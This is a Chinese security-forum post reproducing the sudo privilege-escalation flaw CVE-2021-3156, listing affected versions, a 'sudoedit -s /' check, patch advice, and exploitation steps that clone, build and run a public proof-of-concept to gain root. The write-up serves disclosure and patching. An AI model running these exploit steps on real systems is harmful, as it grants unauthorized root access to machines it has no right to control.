安全矩阵

 找回密码
 立即注册
搜索
查看: 7214|回复: 0

Linux sudo权限提升漏洞复现(CVE-2021-3156)

[复制链接]

991

主题

1063

帖子

4315

积分

论坛元老

Rank: 8Rank: 8

积分
4315
发表于 2021-2-2 19:03:06 | 显示全部楼层 |阅读模式
原文链接:Linux sudo权限提升漏洞复现(CVE-2021-3156)

2021年01月27日,RedHat官方发布了sudo 缓冲区/栈溢出漏洞的风险通告,普通用户可以通过利用此漏洞,而无需进行身份验证,成功获取root权限。

据报道这个漏洞已存在十年了,大部分的linux系统都存在这个sudo漏洞。站在攻击方的角度,这就是sudo提权的新姿势;站在防守方的角度,这可能是近期最需要去重视的漏洞了。

漏洞编号:CVE-2021-3156
漏洞级别:高危
受影响版本:
sudo: 1.8.2 - 1.8.31p2
sudo: 1.9.0 - 1.9.5p1检测方法:
以非root用户登录系统,并运行如下命令:

sudoedit -s /
- 如果响应一个以sudoedit:开头的报错,那么表明存在漏洞。
- 如果响应一个以usage:开头的报错,那么表明补丁已经生效。
漏洞利用:

git clone https://github.com/blasty/CVE-2021-3156.git
cd CVE-2021-3156
make
./sudo-hax-me-a-sandwich <target_number>Kali Linux测试:


ubuntu-20.04.1 测试:


修复建议:
方式1、CentOS软件更新命令:
sudo yum -y update sudo
方式2、下载软件包安装,Sudo 1.9.5p2或更新版本。
sudo软件包下载地址:
https://www.sudo.ws/dist/


回复

使用道具 举报

您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

小黑屋|安全矩阵

GMT+8, 2024-11-28 20:36 , Processed in 0.016030 second(s), 18 queries .

Powered by Discuz! X4.0

Copyright © 2001-2020, Tencent Cloud.

快速回复 返回顶部 返回列表